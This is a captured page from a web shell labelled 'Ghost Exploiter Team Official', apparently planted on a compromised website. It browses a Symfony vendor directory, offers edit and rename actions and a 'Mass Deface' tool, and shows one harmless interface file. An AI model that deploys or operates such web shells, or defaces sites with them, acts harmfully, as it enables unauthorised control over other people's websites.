webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
symfony
/
var-dumper
/
Dumper
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
ContextProvider
--
ren
AbstractDumper.php
5.996KB
edt
ren
CliDumper.php
22.416KB
edt
ren
ContextualizedDumper.php
1.232KB
edt
ren
DataDumperInterface.php
0.535KB
edt
ren
HtmlDumper.php
33.548KB
edt
ren
ServerDumper.php
1.634KB
edt
ren
<?php /* * This file is part of the Symfony package. * * (c) Fabien Potencier <fabien@symfony.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Symfony\Component\VarDumper\Dumper; use Symfony\Component\VarDumper\Cloner\Data; /** * DataDumperInterface for dumping Data objects. * * @author Nicolas Grekas <p@tchwork.com> */ interface DataDumperInterface { /** * @return string|null */ public function dump(Data $data); }
<=Back
Liking